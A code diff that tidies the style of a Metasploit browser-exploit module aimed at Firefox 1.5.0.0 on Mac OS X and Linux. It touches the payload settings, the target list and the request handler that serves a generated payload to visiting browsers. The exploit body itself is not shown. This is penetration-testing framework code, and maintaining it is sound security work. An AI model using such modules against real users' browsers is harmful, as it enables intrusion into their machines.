@@ -32,9 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Payload' => {
           'Space' => 1000 + (rand(256).to_i * 4),
-          'BadChars' => "\x00",
+          'BadChars' => "\x00"
         },
-        'Platform' => %w{osx linux},
         'Targets' => [
           [
             'Firefox 1.5.0.0 Mac OS X',
@@ -48,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'Firefox 1.5.0.0 Linux',
             {
               'Platform' => 'linux',
-              'Arch' => ARCH_X86,
+              'Arch' => ARCH_X86
             }
           ],
         ],
@@ -62,11 +61,11 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def on_request_uri(cli, request)
+  def on_request_uri(cli, _request)
     # Re-generate the payload
-    return if ((p = regenerate_payload(cli)) == nil)
+    return if ((p = regenerate_payload(cli)).nil?)
 
-    print_status("Sending #{self.name}")
+    print_status("Sending #{name}")
     send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
     handler(cli)
   end
